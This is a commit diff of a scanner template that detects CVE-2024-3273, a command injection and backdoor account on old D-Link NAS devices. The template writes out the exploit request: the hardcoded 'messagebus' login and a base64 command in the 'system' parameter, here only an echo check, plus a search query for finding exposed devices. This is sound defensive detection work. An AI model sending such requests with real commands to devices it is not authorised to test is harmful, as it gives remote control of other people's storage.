update template

patch-1
Dhiyaneshwaran 2024-04-10 11:50:39 +05:30 committed by GitHub
parent 64efc5ea0f
commit af9da27fe2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 22 additions and 4 deletions

View File

@ -1,27 +1,45 @@
id: CVE-2024-3273
info:
name: D-Link Network Attached Storage - Command Injection and Backdoor Account
author: pussycat0x
severity: high
description: |
UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
reference:
- https://github.com/netsecfish/dlink
- https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/#google_vignette
- https://news.ycombinator.com/item?id=39960107
- https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383
- https://vuldb.com/?ctiid.259284
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2024-3273
cwe-id: CWE-77
epss-score: 0.00044
epss-percentile: 0.09057
metadata:
verified: true
fofa-query: app="D_Link-DNS-ShareCenter"
tags: cve,cve2024,dlink,nas
variables:
str: "{{rand_base(5)}}"
payload: "echo {{rand_base(5)}}"
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobyB0ZXN0"
- raw:
- |
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={{base64(payload)}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "<auth_state>1</auth_state>"
- "test"
- "{{str}}"
condition: and
- type: status